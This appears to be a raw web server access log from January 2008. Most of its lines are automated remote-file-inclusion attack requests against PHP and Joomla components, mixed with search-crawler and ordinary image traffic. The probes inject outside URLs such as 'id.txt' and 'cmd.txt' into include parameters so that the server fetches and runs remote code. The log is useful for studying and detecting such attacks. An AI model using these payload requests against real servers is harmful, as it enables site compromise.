80.254.178.186 - - [10/Jan/2008:08:46:52 -0800] "GET //?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
80.254.178.186 - - [10/Jan/2008:08:46:53 -0800] "GET /logs//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 30152 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.39 - - [10/Jan/2008:08:47:19 -0800] "GET /logs/access_071214.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.138.63 - - [10/Jan/2008:08:48:21 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [10/Jan/2008:08:48:26 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [10/Jan/2008:08:48:27 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [10/Jan/2008:08:48:30 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [10/Jan/2008:08:48:30 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [10/Jan/2008:08:48:30 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.78.167 - - [10/Jan/2008:08:49:36 -0800] "GET /logs/access_071225.log/?displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [10/Jan/2008:08:50:12 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.72.142.178 - - [10/Jan/2008:08:50:29 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.142.178 - - [10/Jan/2008:08:50:29 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.142.178 - - [10/Jan/2008:08:50:30 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.217.23 - - [10/Jan/2008:08:50:47 -0800] "GET /logs/access_071205.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kamloopstutor.com/images/banners/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.217.23 - - [10/Jan/2008:08:51:32 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kamloopstutor.com/images/banners/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.8.71 - - [10/Jan/2008:08:52:43 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [10/Jan/2008:08:52:44 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.90.101.70 - - [10/Jan/2008:08:52:45 -0800] "GET /logs/access_071205.log//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:08:53:49 -0800] "GET /logs/access_071222.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:08:53:49 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:08:53:50 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.242.70 - - [10/Jan/2008:08:55:29 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.242.70 - - [10/Jan/2008:08:55:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.242.70 - - [10/Jan/2008:08:55:30 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:08:55:36 -0800] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:08:55:36 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:08:55:36 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:08:56:40 -0800] "GET /logs/access_071225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.90.101.70 - - [10/Jan/2008:08:58:23 -0800] "GET /logs/access_071205.log//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.46.84 - - [10/Jan/2008:08:58:43 -0800] "GET /logs/access_071124.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [10/Jan/2008:08:58:43 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [10/Jan/2008:08:58:44 -0800] "GET /logs/access_071224.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.242.70 - - [10/Jan/2008:09:00:19 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.242.70 - - [10/Jan/2008:09:00:20 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.236.242 - - [10/Jan/2008:09:01:44 -0800] "GET //?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.38 - - [10/Jan/2008:09:02:02 -0800] "GET /tmp/?D=A HTTP/1.0" 200 1660 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.84.207.130 - - [10/Jan/2008:09:02:09 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.207.130 - - [10/Jan/2008:09:02:10 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.207.130 - - [10/Jan/2008:09:02:10 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.236.242 - - [10/Jan/2008:09:02:23 -0800] "GET /logs/access_071229.log//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.236.242 - - [10/Jan/2008:09:02:24 -0800] "GET //?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.236.242 - - [10/Jan/2008:09:02:24 -0800] "GET /logs//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 29543 "-" "libwww-perl/5.808" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:02:43 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 200 913443 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:02:43 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 200 927196 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:02:45 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 200 828304 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:02:45 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 200 842640 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:02:46 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 200 812848 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
212.159.3.233 - - [10/Jan/2008:09:03:37 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.159.3.233 - - [10/Jan/2008:09:03:37 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:09:03:38 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:09:03:38 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.159.3.236 - - [10/Jan/2008:09:03:39 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.159.3.234 - - [10/Jan/2008:09:03:39 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.223.244.43 - - [10/Jan/2008:09:03:42 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.223.244.43 - - [10/Jan/2008:09:03:42 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.223.244.43 - - [10/Jan/2008:09:03:42 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.223.244.43 - - [10/Jan/2008:09:03:42 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.223.244.43 - - [10/Jan/2008:09:03:45 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.223.244.43 - - [10/Jan/2008:09:03:45 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.62.65 - - [10/Jan/2008:09:03:55 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.62.65 - - [10/Jan/2008:09:03:55 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:03:56 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 200 913443 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:03:56 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 200 927196 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:03:58 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 200 828304 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:03:58 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 200 842640 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:04:00 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 200 812848 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
66.98.190.6 - - [10/Jan/2008:09:04:07 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.190.6 - - [10/Jan/2008:09:04:07 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.190.6 - - [10/Jan/2008:09:04:16 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.190.6 - - [10/Jan/2008:09:04:16 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:05:10 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 200 927196 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:05:10 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 200 913443 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:05:12 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 200 828304 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:05:12 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 200 842640 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:05:13 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 200 812848 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
70.86.119.18 - - [10/Jan/2008:09:07:37 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.unej.ac.id//content/data/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
70.86.119.18 - - [10/Jan/2008:09:07:37 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.unej.ac.id//content/data/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:07:43 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:07:43 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000022.jpg HTTP/1.1" 200 507829 "http://gotla.guildportal.com/CExplorer/exDlgContentEditor.aspx?Group=80731&ContentInstance=2743726" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
205.234.252.183 - - [10/Jan/2008:09:08:45 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.183 - - [10/Jan/2008:09:08:45 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.183 - - [10/Jan/2008:09:08:45 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.219.108.143 - - [10/Jan/2008:09:09:52 -0800] "GET /logs/access_071229.log/login.php?root_dir=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.95.21.237 - - [10/Jan/2008:09:09:56 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.95.21.237 - - [10/Jan/2008:09:09:56 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.95.21.237 - - [10/Jan/2008:09:09:57 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.219.108.143 - - [10/Jan/2008:09:09:58 -0800] "GET /login.php?root_dir=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.219.108.143 - - [10/Jan/2008:09:09:58 -0800] "GET /logs/login.php?root_dir=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:10:15 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:10:15 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:10:15 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:10:15 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [10/Jan/2008:09:10:15 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.15.64.77 - - [10/Jan/2008:09:10:15 -0800] "GET /logs/access_071229.log//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.64.77 - - [10/Jan/2008:09:10:16 -0800] "GET //?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.64.77 - - [10/Jan/2008:09:10:16 -0800] "GET /logs//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 29543 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.23.156 - - [10/Jan/2008:09:12:00 -0800] "GET /tmp/sess_3d4c3880bdacccd0de3b408052522ecd HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.231.252.26 - - [10/Jan/2008:09:12:37 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.231.252.26 - - [10/Jan/2008:09:12:56 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.231.252.26 - - [10/Jan/2008:09:13:10 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
